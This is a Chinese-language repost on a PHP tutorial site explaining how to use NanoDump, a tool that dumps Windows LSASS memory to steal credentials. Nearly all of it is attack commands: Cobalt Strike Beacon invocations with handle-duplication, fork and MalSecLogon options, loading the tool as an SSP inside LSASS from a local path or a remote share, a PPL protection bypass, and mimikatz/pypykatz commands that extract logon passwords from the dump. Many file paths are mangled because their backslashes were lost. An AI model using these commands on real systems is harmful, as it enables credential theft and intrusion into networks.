如何使用NanoDump导出LSASS进程数据

爱谁谁
发布: 2025-08-19 08:08:32
原创
457人浏览过

如何使用nanodump导出lsass进程数据

关于NanoDump NanoDump是一款功能强大的MiniDump转储文件提取工具,借助该工具,研究人员可以轻松提取LSASS进程中的MiniDump数据。

功能介绍 工具安装与配置 首先,我们需要使用以下命令将该项目源码克隆到本地:

git clone https://www.php.cn/link/7acce0f7501ebb1f74878d577f16cfd6.git
登录后复制

在Linux系统上,我们需要使用MinGW来编译NanoDump源码:

make -f Makefile.mingw
登录后复制

在Windows系统上,我们需要使用MSVC来编译NanoDump源码:

nmake -f Makefile.msvc
登录后复制

Cobalt Strike导入 接下来,我们需要将生成的NanoDump.cna脚本导入到Cobalt Strike中。

工具使用 我们可以在Cobalt Strike的Beacon控制台中直接运行“nanodump”命令来使用NanoDump:

beacon> nanodump
登录后复制

恢复签名 当你下载了NanoDump生成的MiniDump转储文件之后,可以使用以下命令来恢复无效签名:

scripts/restore_signature <dumpfile></dumpfile>
登录后复制

获取敏感信息 下列命令可以通过mimikatz来获取转储文件中的敏感信息:

mimikatz # sekurlsa::minidump <dumpfile>mimikatz # sekurlsa::logonPasswords full</dumpfile>
登录后复制

如果你使用的是Linux系统,也可以使用mimikatz的Python 3版本,即pypykatz来获取转储文件中的敏感信息:

python3 -m pypykatz lsa minidump <dumpfie></dumpfie>
登录后复制

以SSP加载NanoDump 我们可以在LSASS中以SSP的形式加载NanoDump,以避免打开一个句柄。此时,转储的数据将使用一个无效签名(默认为C:WindowsTemp eport.docx)写入磁盘。当转储完成后,DllMain将返回FALSE来控制LSASS卸载NanoDump DLL。

如需修改转储路径和签名配置,可以直接修改entry.c中的NanoDump函数。

NanoDump DLL上传和加载

beacon> load_sspbeacon> delete_file C:WindowsTemp[RANDOM].dll
登录后复制

加载本地DLL

beacon> load_ssp c:ssp.dll
登录后复制

加载远程DLL

beacon> load_ssp \10.10.10.10openSharessp.dll
登录后复制

PPL绕过

beacon> nanodump_ppl -v -w C:WindowsTemplsass.dmp
登录后复制

工具使用演示 通过创建一个Fork间接读取LSASS进程数据,并使用无效签名将转储文件写入磁盘:

beacon> nanodump --fork --write C:lsass.dmp
登录后复制

使用MalSecLogon在一个记事本进程中获取LSASS句柄,然后拷贝句柄以访问LSASS,并读取转储信息:

beacon> nanodump --malseclogon --dup --fork --binary C:Windows
otepad.exe --valid
登录后复制

使用MalSecLogon获取句柄,通过使用Fork间接读取LSASS,并使用无效签名将转储文件写入磁盘:

豆包AI编程
豆包AI编程

豆包推出的AI编程助手

豆包AI编程 483
查看详情 豆包AI编程
beacon> nanodump --malseclogon --fork --valid --write C:WindowsTemplsass.dmp
登录后复制

使用无效签名下载转储文件:

beacon> nanodump
登录后复制

拷贝现有句柄,并使用无效签名将转储文件写入磁盘:

beacon> nanodump --dup --write C:WindowsTemp
eport.docx
登录后复制

获取LSASS进程PID:

beacon> nanodump --getpid
登录后复制

在LSASS中以SSP加载NanoDump:

beacon> load_sspbeacon> delete_file C:WindowsTemp[RANDOM].dll
登录后复制

在LSASS中以SSP加载NanoDump(远程):

beacon> load_ssp \10.10.10.10openShare
anodump_ssp.x64.dll
登录后复制

转储LSASS并绕过PPL:

beacon> nanodump_ppl --dup --write C:WindowsTemplsass.dmp
登录后复制

工具运行截图 如何使用NanoDump导出LSASS进程数据

许可证协议 本项目的开发与发布遵循Apache-2.0开源许可证协议。

项目地址 https://www.php.cn/link/7acce0f7501ebb1f74878d577f16cfd6

参考资料 https://www.php.cn/link/5a18b2b3a647804eec32e380a70ba66f

https://www.php.cn/link/62cd381bcb4bf2191c555395945e4c09

https://www.php.cn/link/7acce0f7501ebb1f74878d577f16cfd6/blob/main/source/entry.c

以上就是如何使用NanoDump导出LSASS进程数据的详细内容,更多请关注php中文网其它相关文章!

最佳 Windows 性能的顶级免费优化软件
最佳 Windows 性能的顶级免费优化软件

每个人都需要一台速度更快、更稳定的 PC。随着时间的推移,垃圾文件、旧注册表数据和不必要的后台进程会占用资源并降低性能。幸运的是,许多工具可以让 Windows 保持平稳运行。

下载
来源:php中文网
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
最新问题
开源免费商场系统广告
热门教程
更多>
最新下载
更多>
网站特效
网站源码
网站素材
前端模板
关于我们 免责申明 举报中心 意见反馈 讲师合作 广告合作 最新更新 English
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号 技术交流群
PHP中文网订阅号
每天精选资源文章推送
PHP中文网APP
随时随地碎片化学习

Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号